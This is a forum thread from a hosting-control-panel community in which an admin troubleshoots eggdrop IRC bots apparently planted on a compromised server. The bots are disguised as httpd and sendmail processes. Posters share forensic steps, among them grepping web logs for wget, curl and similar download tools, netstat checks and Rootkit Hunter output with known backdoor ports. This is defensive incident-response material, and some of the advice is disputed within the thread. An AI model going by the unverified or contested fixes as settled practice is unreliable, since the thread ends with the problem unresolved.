The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

major problem with eggdrop / crontab maybe

Discussion in 'General Discussion' started by chadi, Sep 25, 2004.

  1. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    I am not sure what this is here but I've been getting these emails constantly, about 3-4 every ten minutes. Copies of the emails are below:

    Couldn't find bot 'Fandy' running, reloading...

    ==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 19746
    [21:20] --- Loading eggdrop v1.6.1+IPv6-Akke (Sat Sep 25 2004)
    [21:20] Module loaded: transfer
    [21:20] Listening at telnet port 9999 (users)
    [21:20] Module loaded: channels
    [21:20] Module loaded: server
    [21:20] Module loaded: ctcp
    [21:20] Module loaded: irc
    [21:20] Module loaded: share
    [21:20] Module loaded: filesys (with lang support)
    [21:20] Module loaded: notes (with lang support)
    [21:20] Module loaded: console (with lang support)
    [21:20] Module loaded: blowfish
    [21:20] Module loaded: assoc (with lang support)
    [21:20] Module loaded: wire (with lang support)
    [21:20] Tcl error in file 'a':
    [21:20] invalid command name "proc_msgshowallinfo"
    while executing
    "proc_msgshowallinfo {nick uhost hand rest} {
    global nick nickpass realname owner kops my-ip banner cycle_random
    global notc notm logstore cfgfile ban-..."
    (file "scripts/ary.tcl" line 679)
    invoked from within
    "source scripts/ary.tcl"
    [21:20] * CONFIG FILE NOT LOADED (NOT FOUND, OR ERROR)
    [21:20] 3
    [21:20] Attempt to kill un-allocated socket 3 !!

    Eggdrop v1.6.1+IPv6-Akke (c)1997 Robey Pointer (c)1999, 2000 Eggheads, IPv6
    support by Akke


    Couldn't find bot 'psfonts' running, reloading...

    ==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 19754
    [21:20] --- Loading eggdrop v1.6.1+IPv6-Akke (Sat Sep 25 2004)
    [21:20] Module loaded: transfer
    [21:20] Listening at telnet port 9999 (users)
    [21:20] Module loaded: channels
    [21:20] Module loaded: server
    [21:20] Module loaded: ctcp
    [21:20] Module loaded: irc
    [21:20] Module loaded: share
    [21:20] Module loaded: filesys (with lang support)
    [21:20] Module loaded: notes (with lang support)
    [21:20] Module loaded: console (with lang support)
    [21:20] Module loaded: blowfish
    [21:20] Module loaded: assoc (with lang support)
    [21:20] Module loaded: wire (with lang support)
    [21:20] Tcl error in file 'b':
    [21:20] invalid command name "proc_msgshowallinfo"
    while executing
    "proc_msgshowallinfo {nick uhost hand rest} {
    global nick nickpass realname owner kops my-ip banner cycle_random
    global notc notm logstore cfgfile ban-..."
    (file "scripts/ary.tcl" line 679)
    invoked from within
    "source scripts/ary.tcl"
    [21:20] * CONFIG FILE NOT LOADED (NOT FOUND, OR ERROR)
    [21:20] 3
    [21:20] Attempt to kill un-allocated socket 3 !!

    Eggdrop v1.6.1+IPv6-Akke (c)1997 Robey Pointer (c)1999, 2000 Eggheads, IPv6
    support by Akke


    Couldn't find bot 'D00r' running, reloading...

    ==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 19751
    [21:20] --- Loading eggdrop v1.6.1+IPv6-Akke (Sat Sep 25 2004)
    [21:20] Module loaded: transfer
    [21:20] Listening at telnet port 9999 (users)
    [21:20] Module loaded: channels
    [21:20] Module loaded: server
    [21:20] Module loaded: ctcp
    [21:20] Module loaded: irc
    [21:20] Module loaded: share
    [21:20] Module loaded: filesys (with lang support)
    [21:20] Module loaded: notes (with lang support)
    [21:20] Module loaded: console (with lang support)
    [21:20] Module loaded: blowfish
    [21:20] Module loaded: assoc (with lang support)
    [21:20] Module loaded: wire (with lang support)
    [21:20] Tcl error in file 'c':
    [21:20] invalid command name "proc_msgshowallinfo"
    while executing
    "proc_msgshowallinfo {nick uhost hand rest} {
    global nick nickpass realname owner kops my-ip banner cycle_random
    global notc notm logstore cfgfile ban-..."
    (file "scripts/ary.tcl" line 679)
    invoked from within
    "source scripts/ary.tcl"
    [21:20] * CONFIG FILE NOT LOADED (NOT FOUND, OR ERROR)
    [21:20] 3

    Eggdrop v1.6.1+IPv6-Akke (c)1997 Robey Pointer (c)1999, 2000 Eggheads, IPv6
    support by Akke


    ----
    For the record, I've checked all background process killers in WHM, checked "prevent nobody from sending emails...", enabled open_basedir, enabled mod_userdir, disabled compilers tweak, enabled suexec. What else can I do here to stop whatever this nonsense is?
     
  2. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    Well it looks like you were exploited.

    cd /usr/local/apache/domlogs
    grep wget *
     
  3. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    What exactly should I do?
     
  4. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Type
    uname -r
    netstat -lntp

    Paste the results here.

    Also, download, install, and run RootKit Hunter.

    It looks like you have a RootKit installed. Make sure you have a backup of everything. You may have to reinstall the OS but you can probably save it.

    You can email me directly at abe__froman@hotmail.com for help.
     
  5. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    Results:

    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address Foreign Address State
    PID/Program name
    tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN
    10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:1 0.0.0.0:* LISTEN
    1927/portsentry
    tcp 0 0 0.0.0.0:2082 0.0.0.0:* LISTEN
    10554/cpsrvd - wait
    tcp 0 0 0.0.0.0:2083 0.0.0.0:* LISTEN
    10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN
    10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:2084 0.0.0.0:* LISTEN
    10368/entropychat
    tcp 0 0 0.0.0.0:6693 0.0.0.0:* LISTEN
    1787/sendmail: acce
    tcp 0 0 0.0.0.0:2086 0.0.0.0:* LISTEN
    10554/cpsrvd - wait
    tcp 0 0 0.0.0.0:2087 0.0.0.0:* LISTEN
    10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:6666 0.0.0.0:* LISTEN
    10366/startmelange
    tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
    1515/mysqld
    tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN
    10351/cppop - accep
    tcp 0 0 0.0.0.0:2095 0.0.0.0:* LISTEN
    10554/cpsrvd - wait
    tcp 0 0 127.0.0.1:783 0.0.0.0:* LISTEN
    29869/spamd -d
    tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
    1927/portsentry
    tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN
    1222/xinetd
    tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
    27207/httpd
    tcp 0 0 0.0.0.0:2096 0.0.0.0:* LISTEN
    10575/stunnel-4.04l
    tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN
    29813/exim
    tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
    1231/vsftpd
    tcp 0 0 69.9.174.2:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 69.9.174.15:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 69.9.174.14:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 69.9.174.13:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 69.9.174.12:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 69.9.174.11:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 69.9.174.10:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 69.9.174.9:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 69.9.174.8:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
    1209/sshd
    tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
    29808/exim
    tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN
    1188/named
    tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
    27207/httpd
     
  6. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    RootKit Hunter results:

    Rootkit Hunter 1.1.1 is running

    Determining OS... Ready


    Checking binaries
    * Selftests
    Strings (command) [ OK ]


    * System tools
    Info: prelinked files found
    Performing 'known good' check...
    /usr/bin/find [ OK ]
    /usr/bin/file [ OK ]
    /usr/sbin/prelink: "/usr/bin/groups" is not an ELF file
    /usr/bin/groups [ OK ]
    /usr/bin/kill [ OK ]
    /usr/bin/killall [ OK ]
    /usr/bin/lsattr [ OK ]
    /usr/bin/pstree [ OK ]
    /usr/bin/sha1sum [ OK ]
    /usr/bin/stat [ OK ]
    /usr/bin/users [ OK ]
    /usr/bin/w [ OK ]
    /usr/bin/watch [ OK ]
    /usr/bin/who [ OK ]
    /usr/bin/whoami [ OK ]
    /bin/mount [ OK ]
    /bin/netstat [ OK ]
    /bin/egrep [ OK ]
    /bin/fgrep [ OK ]
    /bin/grep [ OK ]
    /bin/cat [ OK ]
    /bin/chmod [ OK ]
    /bin/chown [ OK ]
    /bin/env [ OK ]
    /bin/ls [ OK ]
    /bin/su [ OK ]
    /bin/ps [ OK ]
    /bin/dmesg [ OK ]
    /bin/kill [ OK ]
    /bin/login [ OK ]
    /sbin/chkconfig [ OK ]
    /sbin/depmod [ OK ]
    /sbin/ifconfig [ OK ]
    /sbin/insmod [ OK ]
    /sbin/ip [ OK ]
    /sbin/modinfo [ OK ]
    /sbin/sysctl [ OK ]
    /sbin/syslogd [ OK ]
    /sbin/init [ OK ]
    /sbin/runlevel [ OK ]

    * Suspicious files and malware
    Scanning for known rootkit files [ OK ]
    Miscellaneous Login backdoors [ OK ]
    Miscellaneous directories [ OK ]
    Sniffer logs [ OK ]

    [Press <ENTER> to continue]


    * Trojan specific characteristics
    shv4
    Checking /etc/rc.d/rc.sysinit
    Test 1 [ Clean ]
    Test 2 [ Clean ]
    Test 3 [ Clean ]
    Checking /etc/inetd.conf [ Clean ]

    * Suspicious file properties
    chmod properties
    Checking /bin/ps [ Clean ]
    Checking /bin/ls [ Clean ]
    Checking /usr/bin/w [ Clean ]
    Checking /usr/bin/who [ Clean ]
    Checking /bin/netstat [ Clean ]
    Checking /bin/login [ Clean ]
    Script replacements
    Checking /bin/ps [ Clean ]
    Checking /bin/ls [ Clean ]
    Checking /usr/bin/w [ Clean ]
    Checking /usr/bin/who [ Clean ]
    Checking /bin/netstat [ Clean ]
    Checking /bin/login [ Clean ]

    * OS dependant tests

    Linux
    Checking loaded kernel modules... [ OK ]


    Networking
    * Check: frequently used backdoors
    Port 2001: Scalper Rootkit [ OK ]
    Port 2006: CB Rootkit [ OK ]
    Port 2128: MRK [ OK ]
    Port 14856: Optic Kit (Tux) [ OK ]
    Port 47107: T0rn Rootkit [ OK ]
    Port 60922: zaRwT.KiT [ OK ]

    * Interfaces
    Scanning for promiscuous interfaces [ OK ]

    System checks
    * Allround tests
    Checking hostname... Found. Hostname is host.nibuhadns.com
    Checking for differences in user accounts... [ NA ]
    Checking for differences in user groups... Creating file It seems this is your first time.
    Checking rc.local file...
    - /etc/rc.local [ OK ]
    - /etc/rc.d/rc.local [ OK ]
    - /usr/local/etc/rc.local [ Not found ]
    - /usr/local/etc/rc.d/rc.local [ Not found ]
    - /etc/conf.d/local.start [ Not found ]
    Checking rc.d files...
    Processing........................................
    ........................................
    ........................................
    ........................................
    ........................................
    ........................................
    ........................................
    ........................................
    .............
    Result rc.d files check [ OK ]
    Checking history files
    Bourne Shell [ OK ]

    * Filesystem checks
    Checking /dev for suspicious files... [ OK ]
    Scanning for hidden files... [ OK ]

    [Press <ENTER> to continue]



    Security advisories
    * Check: Groups and Accounts
    Searching for /etc/passwd... [ Found ]
    Checking users with UID '0' (root)... [ OK ]

    * Check: SSH
    Searching for sshd_config...
    Found /etc/ssh/sshd_config
    Checking for allowed root login... [ OK (Remote root login disabled) ]
    Checking for allowed protocols... [ Warning (SSH v1 allowed) ]

    * Check: Events and Logging
    Search for syslog configuration... found
    Checking for running syslog slave... [ OK ]
    Checking for logging to remote system... [ OK (no remote logging) ]


    ---------------------------- Scan results ----------------------------

    MD5
    MD5 compared: 41
    Incorrect MD5 checksums: 0

    File scan
    Scanned files: 309
    Possible infected files: 0
    Possible rootkits:

    Scanning took 44 seconds
     
  7. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Thanks, now do
    uname -r

    You can get rootkit hunter here:
    http://www.rootkit.nl/projects/rootkit_hunter.html

    It looks like they have eggdrop or something running on port 6693 claiming to be send mail
    tcp 0 0 0.0.0.0:6693 0.0.0.0:* LISTEN
    1787/sendmail: acce

    PLease type
    cat /proc/1787/cmdline
    cat /proc/1787/environ

    paste out put here.
     
  8. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    As you can see on my previous post, I have already installed and ran rootkit hunter.

    2.6.8-1.521smp

    root@host [~]# cat /proc/1787/cmdline
    sendmail: accepting connections

    root@host [~]# cat /proc/1787/environ
    SHELL=/bin/shPATH=/usr/bin:/bin_=./procPWD=/home/gvllweb/public_html/images/language/.psySHLVL=3HOME=/LOGNAME=nobodyroot@host [~]#
     
  9. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    kill -9 1787
    kill -9 1787
    yes, twice, it should say "no process killed" the second time

    suspend this account immediately gvllweb
    he is running vulnerable scripts.

    La'shana Tova!

    Glad I could help,
    Sincerely,
    Abe Froman
    Security Expert
    "I'm game for security"
     
  10. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    #10 StevenC, Sep 25, 2004
    Last edited: Sep 25, 2004
  11. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    This response was not great.

    Sinerely,
    Abe Froman
    Security Expert
    "I'm game for security"
     
    #11 AbeFroman, Sep 26, 2004
    Last edited: Sep 27, 2004
  12. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    Well, the problem still persists. Anyone know what could be the problem?
     
  13. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16

    It will tell him what script was exploited if he was exploited by a php script. Besides you tried to feed him some garbage when you know nothing about security execpt a few bits of info people have given you. It also appears you ignored my post. You cannot be become a security expert in 11 days. Also in order for you to be come a security expert you must be an expert in linux:

    http://forums.cpanel.net/showthread.php?t=29895
    Doesnt appear you are a expert....that is general linux knowledge.
     
    #13 StevenC, Sep 26, 2004
    Last edited: Sep 26, 2004
  14. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Try netstat again, is that port open again?
     
  15. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Not if it was exploited using anything other than wget, nor if it was exploit before the logs were rotated.
     
  16. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    What am I supposed to be looking for exactly? I ran netstats and it showed about 100+ lines of info, some "timed wait" and others "established".

    WHat should I show you?
     
  17. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    grep lynx *
    grep rcp *
    grep scp *
    grep eggdrop *
    grep fetch *
    grep curl *
    grep "/tmp" *



    Happy now?
     
  18. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    Results:

    root@host [~]# grep lynx *
    install.log:lynx-2.8.5-15.i386.rpm

    root@host [~]# grep rcp *
    root@host [~]#

    root@host [~]# grep scp *
    root@host [~]#

    root@host [~]# grep eggdrop *
    root@host [~]#

    root@host [~]# grep fetch *
    install.log:Installing fetchmail-6.2.5-2.i386.
    root@host [~]#

    root@host [~]# grep curl *
    install.log:Installing curl-7.11.1-1.i386.
    install.log:Installing curl-devel-7.11.1-1.i386.
    root@host [~]#

    root@host [~]# grep "/tmp" *
    install:$opt{directory} = "/tmp/sis-packages";
    install: (defaults to '/tmp/sis-packages')
    root@host [~]#
     
  19. WestBend

    WestBend Well-Known Member

    Joined:
    Oct 12, 2003
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    16
    I am not a security expert.. However i have used eggdrops for years.

    The eggdrop is not loading up so it is sending an email saying it could not load its config file in which case it dies. When it does load it is attempting to open port 9999 for remote telnet connections by user.


    Here are some of the files an eggie normally uses, try searching for them specifically:

    autobotchk
    *.user
    *.chan
    pid.botname
    assoc.so
    console.so
    server.so
    uptime.so
    blowfish.so
    ctcp.so
    irc.so
    share.so
    wire.so
    channels.so
    dns.so
    notes.so
    stats.so
    woobie.so
    compress.so
    filesys.so
    seen.so
    transfer.so

    directories :

    filesys
    modules



    One last quick question...

    Where are the emails coming from? Are they actually coming from your server or has someone put your email address in their config file in which case all your doing is getting notices.... but nothing has been installed on your server. It would be a little strange to root someones box and then have any error emails sent to the email addresses on the rooted box..
     
    #19 WestBend, Sep 26, 2004
    Last edited: Sep 26, 2004
  20. chadi

    chadi BANNED

    Joined:
    Apr 20, 2004
    Messages:
    415
    Likes Received:
    0
    Trophy Points:
    0
    Thank you for your response but what exactly should I do with the files now?

    I basically want to end the notifications and just whatever cronjobs related.
     
Loading...

Share This Page